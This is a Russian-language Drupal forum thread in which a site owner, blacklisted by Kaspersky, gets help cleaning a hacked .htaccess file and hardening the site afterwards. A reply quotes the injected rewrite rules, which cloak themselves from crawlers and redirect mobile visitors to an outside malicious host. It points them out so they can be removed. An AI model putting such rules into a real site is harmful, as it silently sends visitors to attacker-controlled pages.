Файл .htaccess

Главные вкладки

Аватар пользователя kitov kitov 25 сентября 2013 в 12:51

Здравствуйте.

Получил сообщение от лаборатории Касперского, что мой сайт добавлен в черный список якобы из-за того,
что был заменен файл .htaccess

Как быть в этом случае? заливать новый файл?

прилагаю файл в формате txt, который сейчас залит на сайт.

ВложениеРазмер
Иконка простого текстового файла htaccess_cargobroker.ru_.txt3.44 КБ

Комментарии

Аватар пользователя Kaer Kaer 25 сентября 2013 в 13:25

вот это удалите из файла

RewriteCond %{HTTP_USER_AGENT} (android|midp|j2me|symbian|series\ 60|symbos|windows\ mobile|windows\ ce|ppc|smartphone|blackberry|mtk|windows\ phone|iemobile|nokia|ucweb|ucbrowser|iPad|iPhone) [NC]
RewriteCond %{HTTP_USER_AGENT} !(bot|ia_archiver|crawler|slurp|validator|webalta|yahoo|yandex|google|curl|wget) [NC]
RewriteRule (.*) http://pda.qwertysoft.biz/?29&source=cargobroker.ru [L,R=302] # on

, это редирект. Если к вам заходят с мобильных платформ от их перенапровляют к плохим дядкам.

Проверьте через что вам взломали. Меня как-то также ломанули через Sypex Dumper, удалите его из корня если есть.

Аватар пользователя kitov kitov 25 сентября 2013 в 13:49

Kaer,
правильно ли я понял, что именно те строки, что Вы выделили и нужно удалить из файла?
А как проверить через что взломали?
пароль сменить на клиенткой панели хостига и на админке Друпала?

Аватар пользователя Kaer Kaer 25 сентября 2013 в 13:55

"kitov" wrote:
правильно ли я понял, что именно те строки, что Вы выделили и нужно удалить из файла?

да только эти 3 строки
"kitov" wrote:
А как проверить через что взломали?

специалист должен сделать анализ возможных дыр
"kitov" wrote:
пароль сменить на клиенткой панели хостига и на админке Друпала?

я бы рекомендовал сменить пароли суперюзера(это первый пользователь, чаще всего admin) и доступ к БД, и наверное не помешает ключ к крону изменить.
Если у вас вдруг один пароль на все, то меняйте везде где можно

Аватар пользователя Kaer Kaer 25 сентября 2013 в 14:30

"kitov" wrote:
Все понял кроме вот этого "ключ к крону". это где можно настроить?

в файл sites/default/settings.php в конец добавьте строку

$conf['cron_key'] = 'абракадабра';

абракадабра замените на свою любую комбинацию английских символов и цифр желательно символов так 16-32. Также измените параметр запуска крона на хостинге.

Аватар пользователя Kaer Kaer 25 сентября 2013 в 14:54

"kitov" wrote:
здесь же sites/default/settings.php надо и новый пароль к БД указать, верно?

теоретически да, если появятся ошибки, то лучше сделайте по науке-правильно:
1. Удалите файл settings.php
2. Откройте сайт
3. Пройдите процесс инсталляции заново, указав уже новый пароль к БД

Так по идее и ключ крона сам обновится

Аватар пользователя kitov kitov 25 сентября 2013 в 15:03

ни через FTP ни с панели хостера файл settings.php удалить не выходит. Пишет "550 Delete operation failed."

Видимо проблема более глобальна...

Аватар пользователя kitov kitov 25 сентября 2013 в 15:12

хотя нет, на хостинге удалился файл.

это что теперь нужно заново ядро установить?
хм, но я этого ни разу не делал...

Аватар пользователя kitov kitov 25 сентября 2013 в 15:18

уффф...
закачал в папке на хостинге новый файл settings.php - все заработало

Kaer, правильно я дописал?
*/
# $conf['locale_custom_strings_en'] = array(
# 'forum' => 'Discussion board',
# '@count min' => '@count minutes',
# );
$conf['cron_key'] = 'абракадабра';

"Kaer" wrote:
Также измените параметр запуска крона на хостинге.

А какой интервал времени Вы рекомендуете задать для выполнения крона?!

Аватар пользователя kitov kitov 10 ноября 2015 в 11:49

Kaer,
в панели хостинга необходимо указать путь до файла (см. приложениен).
Правильно ли я понимаю, что нужно указать путь типа /public_html/cron.php